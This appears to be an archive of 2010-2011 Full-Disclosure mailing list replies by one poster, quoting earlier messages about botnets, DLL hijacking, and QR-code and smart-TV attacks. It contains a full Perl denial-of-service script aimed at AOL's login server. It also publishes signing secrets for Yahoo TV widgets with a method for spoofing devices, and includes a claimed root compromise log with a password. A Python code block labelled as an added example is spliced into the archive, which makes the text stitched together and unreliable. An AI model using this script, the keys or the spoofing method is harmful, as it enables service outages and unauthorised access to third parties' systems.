Re: [Full-disclosure] Using QR tags to Attack SmartPhones (Attaging)

2011-09-20 Thread T Biehn
I like the idea of advertising a 'free * for your phone' around interesting
targets, perhaps posting fake adverts in the DC subway system? I think
people will trust print more than web and jump at the opportunity to scan
and install anything.

-Travis


On Sun, Sep 11, 2011 at 12:04 AM, Augusto Pereyra wrote:

> I'd like to share this paper with all.
>
> English version
>
> http://kaoticoneutral.blogspot.com/2011/09/using-qr-tags-to-attack-smartphones_10.html
>
> Version en español
>
> http://kaoticoneutral.blogspot.com/2011/09/using-qr-tags-to-attack-smartphones.html
>
> Thanks to all
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/




-- 
Twitter  |
LinkedIn|
TravisBiehn.com 

full-disclosure@lists.grok.org.uk

2011-09-20 Thread T Biehn
There were some trojans back in the day that would imitate normal browsing
(proxying cnn.com for instance) and it'd stuff encrypted command packets
in there.
Combine that with a load balancing check-back time in the response, you can
probably support a very large number of bots on a single webserver.

-Travis

On Sat, Sep 17, 2011 at 8:10 PM, Corey Nachreiner <
corey.nachrei...@watchguard.com> wrote:

> This basic video series may help:
>
>
> http://www.watchguard.com/tips-resources/video-tutorials/botnets-part-one.asp
>
> http://www.watchguard.com/tips-resources/video-tutorials/botnets-part-two.asp
>
> http://www.watchguard.com/tips-resources/video-tutorials/botnets-part-three.asp
>
> http://www.watchguard.com/tips-resources/video-tutorials/botnet-source-code-for-overachievers.asp
>
> That said, we made that ages ago. It is quite dated. Most modern botnets
> have started to use HTTP C&C channels, often encrypted. They also sometimes
> obfuscate their C&C via proxies and p2p. Leaked source code for Zeus and
> SpyEye probably would provide a better idea of how modern botnets work.
>
> Cheers,
>
> Corey Nachreiner, CISSP | Senior Network Security Strategist
> WatchGuard Technologies, Inc. | www.watchguard.com
>
> 206.613-0873 Direct
> 206.227.6905 Mobile
> corey.nachrei...@watchguard.com
>
> Office Hours: 9:15 AM to 6:15 PM Pacific (GMT-8), Mon - Fri
>
> Better be despised for too anxious apprehensions, than ruined by too
> confident security. - Edmund Burke
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> WatchGuard: Stronger Security, Simply Done
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] On Behalf Of RandallM
> Sent: Friday, September 16, 2011 8:38 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] understanding the botnet C&C..
>
> hi
> an area that I am basically "stupid" on is botnets. Not what they are
> but "how" they work through IRC as the control center. Not just that
> but the various modern programs used. I am aware for instance LOIC can
> be used to connect to an IRC channel.. but, how then does the "herder"
> do the job from IRC..how does he issue commands that all the computers
> connected act upon, etc. ? My curiosity has just got the best of me
> and I would like some pointers to good material that can feed it.
>
> Sorry for the "troll" like post but I really would like to understand
> this further. Have done a number of Google searches but have hope
> someone here has done personal research.
>
> --
> been great, thanks
> RandyM
> a.k.a System
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available

2011-08-10 Thread T Biehn
Maybe he should build a vulnerability into each version, so he can announce
each new version with the disclosure and satisfy your constraints.

-Travis

On Wed, Aug 10, 2011 at 10:44 AM, Steven Pinkham wrote:

> valdis.kletni...@vt.edu wrote:
> > On Tue, 02 Aug 2011 22:17:58 -0300, root said:
> >> Dude you just released INSECT Pro 2.7 less than a week ago. I swear to
> >> god I'm being serious.
> >
> > It's not unusual for commercial products with customers that demand product
> > stability to release version 3.5 or whatever, then release 3.6, and after that
> > release 3.5.1, 3.5.2, yadda yadda with just bugfixes so sites can get patched
> > without having to make the 3.5->3.6 jump.
>
> Yes.  But they don't spam full-disclosure with that info every week.
> Rapid releases can be good, but the list charter says:
>
> "Gratuitous advertisement, product placement, or self-promotion is
> forbidden."
>
> Announcing every point release of a commercial product falls afoul of
> that.
> --
>  | Steven Pinkham, Security Consultant|
>  | http://www.mavensecurity.com   |
>  | GPG public key ID CD31CAFB |
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] new anon tool

2011-08-03 Thread T Biehn
nothing.

On Wed, Aug 3, 2011 at 5:08 PM, RandallM  wrote:

> have you heard much about the #RefRef  tool? What's so unique and hasn't
> been done or tried before?
>
> --
> been great, thanks
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] (fractal-Self__) : A theoretical introduction to Universe, Conscious Machines and Programming Ur-cells !!!

2011-06-13 Thread T Biehn
tl;dr
ACID IS A LOT OF FUN AMIRITE?

-TRAVIS

On Sun, Jun 12, 2011 at 8:36 PM, Christian Sciberras wrote:

> Fractal fractal fractal, even us that coined the concept can't keep it
> going forever.
> Seems evident that each subsystem loses key aspects of its parent, this
> might turn out to be a system flaw, or a constrained space.
> We might have discovered this flaw already and we might have been using all
> this time since nothing tells us the laws of our universe are true to its
> container (if at all).
>
> Chris.
>
>
>
> On Sun, Jun 12, 2011 at 10:13 PM, Michal Zalewski wrote:
>
>> > Paradox are way of life... Hence, the goal here is to question every
>> > knowledge with reasoning and trying-not to build a static opinion on
>> > anything.
>>
>> But have you tried contacting the vendor first?
>>
>> /mz
>>
>>
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] LulzSec EXPOSED!

2011-06-06 Thread T Biehn
Will you be presenting at BlackHat?

-Travis

On Mon, Jun 6, 2011 at 9:57 AM, Benji  wrote:

> (picture found by looking through dir)
>
>
> On Mon, Jun 6, 2011 at 2:54 PM, Andreas Bogk  wrote:
>
>> Excerpts from Benji's message of Mo Jun 06 15:32:11 +0200 2011:
>> > http://89.248.164.63/dox/xyz/20.png
>>
>> Ah, that's a much saner explanation. :)
>>
>> Andreas
>>
>>
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] LulzSec EXPOSED!

2011-06-06 Thread T Biehn
LOL @
"A timing attack on ssh passwords over the net?"

and

"I think its just a bruteforce."

-Travis

On Mon, Jun 6, 2011 at 7:58 AM, Gichuki John Chuksjonia <
chuksjo...@gmail.com> wrote:

> I think its just a bruteforce.
>
>
>
>
> On 6/6/11, Andreas Bogk  wrote:
> > Excerpts from lulzfail's message of Mo Jun 06 08:39:42 +0200 2011:
> >> Lulzsec == pwnt
> >
> > I've seen the log you pasted to pastebin.  Is this:
> >
> >  * A timing attack on ssh passwords over the net?
> >  * Fake, to distract us from your real 0day?
> >
> > Andreas
> >
> > Log:
> >
> > root@gibson:~# ./1337hax0r 204.188.219.88 -root
> > Attempting too hax0r root password on 204.188.219.88
> >
> >
> > Password hax0rd! root password: M8eCvSLhkTe
> >
> > root@gibson:~# ssh 204.188.219.88
> >
> > root@204.188.219.88's password:
> >
> > root@xyz:~# hostname; id; w
> > xyz
> > uid=0(root) gid=0(root) groups=0(root)
> >
> >
>
>
> --
> --
> Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
> I.T Security Analyst and Penetration Tester
> jgichuki at inbox d0t com
>
> {FORUM}http://lists.my.co.ke/pipermail/security/
> http://chuksjonia.blogspot.com/
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Some magic secrets.

2011-05-23 Thread T Biehn
Yeah these are Yahoo TV Widget url signing keys for Samsung & LG devices,
they are used together with a timestamp to prevent you from grabbing other
people's widgets/spoofing devices. If you fire up wireshark while you're
poking at these TVs you'll see some calls to Yahoo services ending in
&sign=

url = http://yahoo?1=a&2=b&3=c
url = url + "&sign=" + md5(url + Secret)

Update the ts (timestamp in msecs) parameter, resign, post & play.
Interesting to look at the various widgets & sources, none of them have any
form of obfuscation applied to the javascript, could be useful in finding
and exploring unknown APIs :)

-Travis

On Thu, Mar 10, 2011 at 3:18 PM, Ryan Sears  wrote:

> Hrm
>
> Could this have something to do with this => http://pastebin.com/rD8hwpxT? :-P
>
> As far as 'magic secrets' go, either disclose something or don't. Then move
> on, personally I think posting cryptic messages to a public forum like this
> is a bit dumb. If you're trying to say something, just say it.
>
> Ryan
>
> - Original Message -
> From: "T Biehn" 
> To: "full-disclosure" 
> Sent: Thursday, March 10, 2011 1:22:50 PM GMT -05:00 US/Canada Eastern
> Subject: [Full-disclosure] Some magic secrets.
>
> SA: R8P6PtAlwn2bQobnedI2g7TxgqL4n091Fcq44nRh6CY-
> L: qCb_hz5hQVQezObhN.VP8HYkBdubli1el0xDUxDpvrU-
> SO:?
> V:?
>
> Do the replace live: localhost
>
>
> Also,
> First!
>
> -Travis
> --
> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> http://pastebin.com/f6fd606da
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
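
The `md5(url + Secret)` signing described in the message above, next to a hardened server-side verifier, as an added example that is not part of the original post and not Yahoo's code. Only `ts` and `sign` come from the post; the host `widgets.example`, the `device` and `nonce` parameters, the keys, the per-device key derivation and the five-minute window are assumptions.

```python
import hashlib
import hmac
import time
from urllib.parse import parse_qsl, urlencode, urlsplit

# Constructed values for illustration; not real keys, hosts or parameters.
SHARED_SECRET = "constructed-shared-secret"    # one value baked into every device
MASTER_KEY = b"constructed-server-master-key"  # never leaves the server
MAX_SKEW_MS = 5 * 60 * 1000                    # assumed freshness window


def legacy_sign(url, secret=SHARED_SECRET):
    """Scheme from the post: url + "&sign=" + md5(url + Secret)."""
    return url + "&sign=" + hashlib.md5((url + secret).encode()).hexdigest()


def legacy_verify(signed_url, secret=SHARED_SECRET):
    """Accepts any URL signed with the shared secret, whichever device it names."""
    url, sep, _sig = signed_url.rpartition("&sign=")
    if not sep:
        return False
    return hmac.compare_digest(legacy_sign(url, secret).encode(), signed_url.encode())


def device_key(device_id):
    """Hypothetical per-device key: extracting one key exposes one device only."""
    return hmac.new(MASTER_KEY, device_id.encode(), hashlib.sha256).digest()


def _canonical(url):
    """Host, path and sorted query pairs, so parameter order cannot alter the MAC input."""
    parts = urlsplit(url)
    pairs = sorted(parse_qsl(parts.query, keep_blank_values=True))
    return f"{parts.netloc}{parts.path}?{urlencode(pairs)}", pairs


def hardened_sign(url, key):
    """HMAC-SHA256 over the canonical request instead of a bare hash with a suffix secret."""
    canon, _ = _canonical(url)
    return url + "&sign=" + hmac.new(key, canon.encode(), hashlib.sha256).hexdigest()


class Verifier:
    """Server-side check: per-device MAC, timestamp freshness, nonce replay cache."""

    def __init__(self):
        # A production cache would expire entries older than MAX_SKEW_MS.
        self.seen = set()

    def verify(self, signed_url, now_ms=None):
        now_ms = int(time.time() * 1000) if now_ms is None else now_ms
        url, sep, sig = signed_url.rpartition("&sign=")
        if not sep:
            return "missing signature"
        canon, pairs = _canonical(url)
        params = dict(pairs)
        if len(params) != len(pairs):
            return "duplicate parameter"
        device, nonce, ts = params.get("device"), params.get("nonce"), params.get("ts", "")
        if not device or not nonce or not (ts.isascii() and ts.isdigit()):
            return "malformed request"
        expected = hmac.new(device_key(device), canon.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected.encode(), sig.encode()):
            return "bad signature"
        if abs(now_ms - int(ts)) > MAX_SKEW_MS:
            return "stale timestamp"
        if (device, nonce) in self.seen:
            return "replay"
        self.seen.add((device, nonce))
        return "ok"


if __name__ == "__main__":
    now = int(time.time() * 1000)
    base = "http://widgets.example/api?device={}&ts={}&nonce={}"
    v = Verifier()
    req = hardened_sign(base.format("tv-A", now, "n1"), device_key("tv-A"))
    print("first use :", v.verify(req, now))
    print("second use:", v.verify(req, now))
    other = hardened_sign(base.format("tv-B", now, "n2"), device_key("tv-A"))
    print("tv-A key signing as tv-B:", v.verify(other, now))
    print("legacy, any device name:", legacy_verify(legacy_sign(base.format("tv-B", now, "n3"))))
```

With the shared-secret scheme the server has no way to tell devices apart, while the per-device MAC rejects a request that names a device other than the one whose key signed it.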

Re: [Full-disclosure] psnhack - playstation network hack

2011-05-01 Thread T Biehn
I'm pretty sure the ps3dev crowd aren't responsible for any sort of breach
of Sony's servers. But, I guess, if you didn't understand what they were
talking about you'd see 'hack' and 'psn'.

-Travis

2011/5/1 アドリアンヘンドリック 

> Dear operators of Full disclosure,
>
> Please do not make the below message to be up in the maillist.
> The link which contains translation text is currently being used by
> what so called anonymous and they put it in their site.
> I am really angry and frustrated for it, and erasing the text file in
> my server now.
> Sorry for the inconvenience.
>
> On Sun, May 1, 2011 at 9:22 PM, ZeroDay.JP 
> wrote:
> > Just having some additional info to share regardingly. Sorry for interrupt.
> >
> > In Japan people were very patient to wait for announce from Sony, while in
> > heart worried so much.
> > It was 27th just a day before summer holiday here when the announce came ..
> > I got to hold the phone for 3 hours to pass through to cancel all cards.
> >
> > Today I was watching the whole Sony news conference and writing it in text
> > word by word then took time to translate to English. The reporters here were
> > presenting the user's feelings very well, and I really respect them a lot,
> > they cleverly cornered Mr. Hirai's team with very logical questions.
> > Access for the Q&A text is here... http://0day.jp/data/PSN.txt
> >
> > I hope this list allowed this message to pass through, for I got a strong
> > sense that maybe I cannot hold the text uptime for too long.
> >
> > Best regards,
> > ---
> > Hendrik ADRIAN
> > ZeroDay Japan http://0day.jp
> > Twit: @unixfreaxjp, blog: "ZeroDay.JP" http://unixfreaxjp.blogspot.com
> >
> >
> >
> >
> > Sent to you by ZeroDay.JP via Google Reader:
> >
> >
> >
> >
> > Re: psnhack - playstation network hack
> >
> > via Full Disclosure on 5/1/11
> >
> > Posted by Peter Osterberg on May 01
> >
> > In Sweden they did that 14 days after they got hacked, and at the same
> > time informed us that we should pay attention to weird things happening
> > on our bank accounts...
> >
> > LOL, it's fucking lame to come out with that warning 14 days after it
> > happened... Quite obvious that they wanted to bury the whole thing...
> >
> > Thor (Hammer of God) skrev 2011-04-30 19:13:
> >
> >
> >
> >
> > Things you can do from here:
> >
> > Subscribe to Full Disclosure using Google Reader
> > Get started using Google Reader to easily keep up with all your favorite
> > sites
> >
> >
> >
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] password.incleartext.com

2011-04-06 Thread T Biehn
I sent this only to Romain,
Some other posters wanted to know the other scenarios.

-Travis

-- Forwarded message --
From: T Biehn 
Date: Wed, Apr 6, 2011 at 10:33 AM
Subject: Re: [Full-disclosure] password.incleartext.com
To: Romain Bourdy 


The only scheme where there's a semblance of security is if the decryption
key was stored in memory only. (Provided on startup perhaps?)

Or the server stores a one way hash of the password for verification, then
the encrypted version, and queues them up on the X for decryption, an admin
grabs the packet and decrypts locally.

Neither of those schemes is likely to have been implemented on any site,
ever.

In which case plain-text is equivalent to encrypted text with an easily
recoverable key.

-Travis


On Wed, Apr 6, 2011 at 10:01 AM, Romain Bourdy  wrote:

> Hi Full-Disclosure,
>
> Just my two cents but ... the fact they can give your password back doesn't
> mean it's stored in cleartext, just that it's not hashed but encrypted with
> some way to get the original data back, this doesn't mean at all it's not
> secured, even though in most cases it's not.
>
>  -Romain
>
>
> On Wed, Apr 6, 2011 at 1:36 PM,  wrote:
>
>> Kinda plaintextoffenders.com?
>>
>> wbr,
>>  - Max
>>
>> full-disclosure-boun...@lists.grok.org.uk wrote on 01.04.2011 02:17:24:
>>
>> > Inc leartext 
>> > Sent by: full-disclosure-boun...@lists.grok.org.uk
>> >
>> > 01.04.2011 13:14
>> >
>> > To
>> >
>> > full-disclosure@lists.grok.org.uk
>> >
>> > cc
>> >
>> > Subject
>> >
>> > [Full-disclosure] password.incleartext.com
>> >
>> > Hi FD,
>> >
>> > Just launched a new website to keep a list of websites storing
>> > passwords in clear text, so far the database is small but feel free
>> > to add some:
>> > http://password.incleartext.com/
>>
>> >
>> > Cheers,
>> > Inc Leartext
>>
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

[Full-disclosure] Some magic secrets.

2011-03-10 Thread T Biehn
SA: R8P6PtAlwn2bQobnedI2g7TxgqL4n091Fcq44nRh6CY-
L: qCb_hz5hQVQezObhN.VP8HYkBdubli1el0xDUxDpvrU-
SO:?
V:?

Do the replace live: localhost


Also,
First!

-Travis
-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

[Full-disclosure] Anyone on list have a Samsung TV w/ Yahoo TV Widgets?

2011-03-04 Thread T Biehn
Working on something, I'm wondering about a few settings on Sammy's vs LG
tvs for YTV.

Shoot me an e-mail if you're interested!

-Travis

-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] DOS AOL AIM via perl

2010-12-14 Thread T Biehn
You need at minimum 2x the number of IPs your target has to take it down.
Via proxies, bots, whatever.

Targets can implement per IP throttling/blacklisting. Which means you need
more IPs than that.

IIRC AOL throttles connection attempts.

-Travis

On Tue, Dec 14, 2010 at 10:13 AM, Cyber Flash wrote:

>   Create many ESTABLISHED connections (60,000) to login.oscar.aol.com server
> and then temporarily disable the local client gateway, close the sockets
> (the RST packets aren’t sent to AOL), reopen the gateway and repeat this
> process.
>
>  Anyone have ideas on the pros/cons of using this technique?
>
> # Client -> Server [SYN]
> # Server -> Client [SYN, ACK]
> # Client -> Server [ACK]
> # Server -> Client 10 bytes (conn_ack)
> # Client -> Server 10 bytes (conn_ack)
> # Server -> Client [ACK]
>
> use IO::Socket;
> use Thread;
> use Win32::OLE qw(in);
>
> # --- SCRIPT CONFIGURATION ---
> my $host="login.oscar.aol.com";
> my $port=80;
>
> # --- END CONFIGURATION ---
> my $ip="";
> my $gateway="";
> my $fake_gateway="1.1.1.1";
> my $mask="";
> my $adpater="";
> my $alive=0;
>
>
> $object=Win32::OLE->GetObject('winmgmts:{impersonationLevel=impersonate}!//.');
> foreach my
> $nic(in$object->InstancesOf('Win32_NetworkAdapterConfiguration')){
>next unless $nic->{IPEnabled};
>$...@{$nic->{IPAddress}}[0];
>$gatew...@{$nic->{DefaultIPGateway}}[0];
>$ma...@{$nic->{IPSubnet}}[0];
>print "IPv4 Address: $ip\nDefault Gateway: $gateway\nSubnet Mask:
> $mask\n";
>last;
> }
>
> $objWMI = Win32::OLE->GetObject("winmgmts://./root/cimv2");
> $colNAs = $objWMI->InstancesOf('Win32_NetworkAdapter');
> foreach my $objNA (in $colNAs){
>next unless $objNA->{NetEnabled};
>$adapter=$objNA->NetConnectionID;
>print "Ethernet Adapter: $adapter\n";
>last;
> }
>
> while (1) {
>for ($n=0;$n<=3000;$n++){
>   $thr=new Thread\&connect;
>   $thr->detach;
>   $t++;
>   print "Connection: $t\n";
>   select(undef, undef, undef, 0.25);
>}
>print "\nDisabling Gateway...\n";
>system("netsh interface ip set address name=\"$adapter\" static $ip
> $mask $fake_gateway 1");
>$alive=1;
>sleep 3;
>print "\nEnabling Gateway\n";
>system("netsh interface ip set address name=\"$adapter\" static $ip
> $mask $gateway 1");
>$alive=0;
> }
>
> sub connect{
>   my $socket =
> IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort=>$port);
>   $socket->recv($data,10);
>   $socket->send($data);
>   while ($alive==0) {sleep 1;}
> }
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back

2010-11-02 Thread T Biehn
a+ troll.

-Travis

On Sun, Oct 31, 2010 at 9:24 AM, Christian Sciberras wrote:

> Only thing, there's the danger of someone using stolen certificates.
> But I'm sure there's another fix for that.
>
> In my opinion, all in all, you're creating a yet another overly complex
> system with as yet more possible flaws.
> Don't forget that each new line of code is a potential attack vector which
> affects any system.
>
> Just my 2 cents...
>
> Chris.
>
>
>
> On Sun, Oct 31, 2010 at 1:09 PM, Mario Vilas  wrote:
>
>> Just signing the update packages prevents this attack, so it's not that
>> hard to fix.
>>
>> On Sat, Oct 30, 2010 at 5:02 PM,  wrote:
>>
>>> On Sat, 30 Oct 2010 04:43:14 +0800, Jacky Jack said:
>>> > It's now a time for vendors to re-consider their updating scheme.
>>>
>>> And do what differently, exactly?
>>>
>>> OK, so it's *possible* to fake out the iTunes update process.  But which is
>>> easier and more productive:
>>>
>>> A) Laying in wait for some random to think "Wow, I should update iTunes" and
>>> hijack the process.
>>>
>>> B) Send out a few hundred thousand spam with a
>>> 'From:upd...@apple-itunes-support.com'
>>> with a link to a site you control and feed the sheep some malware.
>>>
>>> Evilgrade looks like a nice tool to have if you're doing a pen test or a
>>> targeted attack and can somehow get the victim to do an update (possibly social
>>> engineering), but for any software vendor feeding software updates to Joe
>>> Sixpack this threat model is *so* far down the list it isn't funny.  Simply
>>> compare the number of boxes pwned by (A) and (B) - how many people have gotten
>>> pwned because somebody hijacked their update from Symantec or wherever,
>>> compared to the number pwned because they got a popup that said "Your computer
>>> is infected, click here to fix it"?
>>>
>>> Remember - just because a new tool useful for an attacker shows up, does *not*
>>> mean it's a game changer for the industry at large.
>>>
>>>
>>>
>>
>>
>>
>> --
>> HONEY: I want to… put some powder on my nose.
>> GEORGE: Martha, won’t you show her where we keep the euphemism?
>>
>>
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] DLL hijacking POC (failed, see for yourself)

2010-09-16 Thread T Biehn
Shit man, I was keeping notes for my class in pedantry, can't you two keep
it going for a few more days?

-Travis

On Wed, Sep 15, 2010 at 7:19 PM, Stefan Kanthak wrote:

> Christian Sciberras wrote:
>
> >> Yes. Once again: get your homework done!
> >>
> >>> http://www.codeproject.com/KB/DLL/dynamicdllloading.aspx
> >>
> >> That's a double DYNAMIC there!
> >
> > Did you even bother to read the article? The very first paragraph
> > states the difference between the two.
> >
> > Oh, and for the records, you can't statically link to dll files. At
> > least, not in the way you're imagining.
>
> You should start to read what I wrote in
> <34a088424c7d499f988d1adca645b...@localhost>:
>
> | Static linking occurs when the linker builds a binary (this might be a
> | DLL.-) using *.OBJ and *.LIB.
>
> > Static linking (in your case) only works for object files (.o or .lib).
>
> I wrote that already.
>
> >> Why should I bother to do the work of the loader?
> >> I reference the DLL export in my code and expect the loader to resolve
> >> it. There is no need for fancy do-it-yourself DLL entry resolution!
> >
> > Forfuckssake where did this point come from?
>
> Your completely superfluous trip to codeproject.com!
>
> >> Nobody can load a DLL that does not exist!
> >
> > Wow what genius! The hell with that. It's the practice that is wrong.
> > As the saying goes, one shouldn't cry over spilled milk;
> > attempting to load a non-existent is asking for trouble.
> >
> > Oh, and by the way. Looks like MS just broke your little fact...
> > ...they've been loading a nonexistent dll via ACROS' POC (via wab.exe).
>
> Bloody wrong: the .DLL accompanies the *.VCF in the share.
>
> >> Why should I call or even write a routine which checks whether a DLL
> >> exists instead of just calling the loader and let it search/load it?
> >> Hint #1: this is exactly what MSFT advises NOT to do!
> >
> > And they are right. You shouldn't be doing the OS's work.
> >
> >> Hint #2: loading a DLL does not mean to run any code from this DLL!
> >
> > But it is still loading the library into memory.
>
> That's what I expect when loading a DLL.
>
> > From there on, perhaps, some buffer overflow exploit would escalate the issue.
>
> Which issue? Ever heard of Occam's Razor?!
>
> > At which point we all go critical over the damn crap just like you're
> > doing right now.
>
> Why? You wrote that your self-written POC failed!
> ACROS' POC but works. Who's wrong?
>
> >> Who guarantees that your self-written or the OS supplied search routine
> >> will find the same DLL as the loader (just in case you do not use the
> >> fully qualified pathname of the DLL)?
> >
> > Because that is the damn point of the function, to tell us what the
> > hell the loader is doing!!
>
> Which function then tells me what your function is doing?
> LoadLibrary*() IS documented, and its rather well documented.
> There's no need to reprogram it. Just use it. And check its return code!
>
> >> Why should someone with a sane mind let a program (or the OS) search
> >> a DLL twice? Just to waste performance?
> >
> > Why search? A simple CreateFile() (aka FileExists in winapi) over the
> > cached path would suffice.
>
> Which cached path? KISS!
> Remember: for DLL hijacking to work the input to LoadLibrary() needs to
> be a simple filename or a relative pathname.
>
> > Perhaps returning this cached path would completely solve the issue.
>
> Perhaps. The Win32 API but does not provide such a function!
>
> >> For DLLs: always. For EXEs: it depends. Just read it in the MSDN!
> >>
> >> Just in case that you misunderstood "from the very beginning" let me
> >> rephrase it: from the earliest days of DOS/Windows CWD was in the PATH.
> >
> > That is NOT true.
>
> OF COURSE THIS IS TRUE!
>
> > I don't know if it was, perhaps in the Win95 era,
> > but it most certainly is not there today.
>
> %PATH% is ALWAYS equivalent to .;%PATH%
>
> > That was what my POC proved. Did you read the full article? I
> > mentioned cases where the bad dll (in CWD) would not be loaded (and an
> > error followed instead).
> >
> >> Consult MSDN on the DLL load order.
> >
> > I don't have to. If you spared one moment from trolling, you might
> > have noticed me dumping a list from ProcessMonitor...which clearly
> > shows what the dll loading order is.
> >
> >> BTW: Windows' "base directory" is MSFTs notion of $HOME.
> >> Use the right terms/words, PLEASE.
> >
> > Mind not putting words in my mouth? As far as definition goes, a "base
> > directory" is where the source program started from...
>
> Wrong. That's the "application directory".
>
> > that could be a docroot of an index.php file
>
> Wrong again. *.PHP is no executable file format, but associated to an
> application. See CMD.EXE /K ASSOC .PHP and then FTYPE with the output
> of the ASSOC.
>
> > or C:\Windows for notepad.exe.
> > No one said anything about Windows!
>
> ACROS showed a POC for Windows' address book using a *.VCF and a .DLL
> built for Windows.
>
> >> Ca

Re: [Full-disclosure] Virus submission site

2010-09-03 Thread T Biehn
You could set up a website that proxies submissions to virustotal, anubis (so
it's from the future) and retain the executables. Post this website to FD.

You could also deploy a botnet of your own and use them as honeypots then
jack the networks of the lower tier *ircbot fellows to expand your
'honeypot' network.

A good place to start building your "whitehat use honeypot/botnet" is
scraping dronebl, spambl and IP addresses posted to the IRC-Security mailing
list. (Archive helpfully provided for registered users.)

Once you have a sizable network set up you can start "baiting" scammers by
offering various services like selling proxy servers, providing bulletproof
hosting and spamming. You can use this supplemental income to quit your day
job and become a full-time vigilante whitehat.

Eventually you'll build a nice portfolio of clients, if any of them becomes
competitive you can just report their information to the appropriate
authorities, this would also be a nice side-channel of income to enable
further whitehat pursuits and make sure you stay firmly in the man's good
books.

-Travis

On Fri, Sep 3, 2010 at 12:25 PM, IndianZ  wrote:

> http://www.offensivecomputing.net/
> - not very structured, but actual stuff
> - registration required
>
> Cheerz IndianZ
>
> On 09/03/10 16:58, Christian Sciberras wrote:
> > Wish there was a reverse for that... I'm kinda getting tired of running
> > honeypots to get a hopefully recent malware.
> >
> >
> > vx-heavens has a nice (but outdated) list. Anyone knows about others?
> >
> >
> > Cheers,
> > Chris.
> >
> >
> > On Fri, Sep 3, 2010 at 4:48 PM, Hacxx 20  wrote:
> >
> >> Hi,
> >>
> >> Do you have virus archived? Submit them to all major antivirus
> companies.
> >>
> >> Visit http://virus-submission.tk
> >>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Windows XP bug

2010-07-07 Thread T Biehn
This is fairly classic, not novel.
Your POC is fairly classic, not novel.

-Travis

On Wed, Jul 7, 2010 at 1:54 PM, BlackHawk  wrote:

> Hi list, I recently discovered a very small Windows XP bug, kind of
> useless alone but that could be useful in some scenarios.
>
> Explanation:
>
> when you try to access a non existing directory through shell command
> "cd", XP returns an error (obviously), but if you cd to a non-existing
> & move one directory up, you'll not get any error.
>
> Example:
> ---
> C:\>cd ./somerandomchars <-- Will give an error
> Impossibile trovare il percorso specificato.
>
> C:\>cd ./somerandomchars/../ <-- Everything is ok
>
> C:\>
> ---
>
> PoC on how to make this thing useful:
>
> http://www.scribd.com/doc/28080332/Podcast-Generator-1-3-Arbitrary-File-Download-Windows
>
> Hope this could be useful for you in some way..
>
> --
> BlackHawk - hawkgot...@gmail.com
>
> Sent with Gmail
>

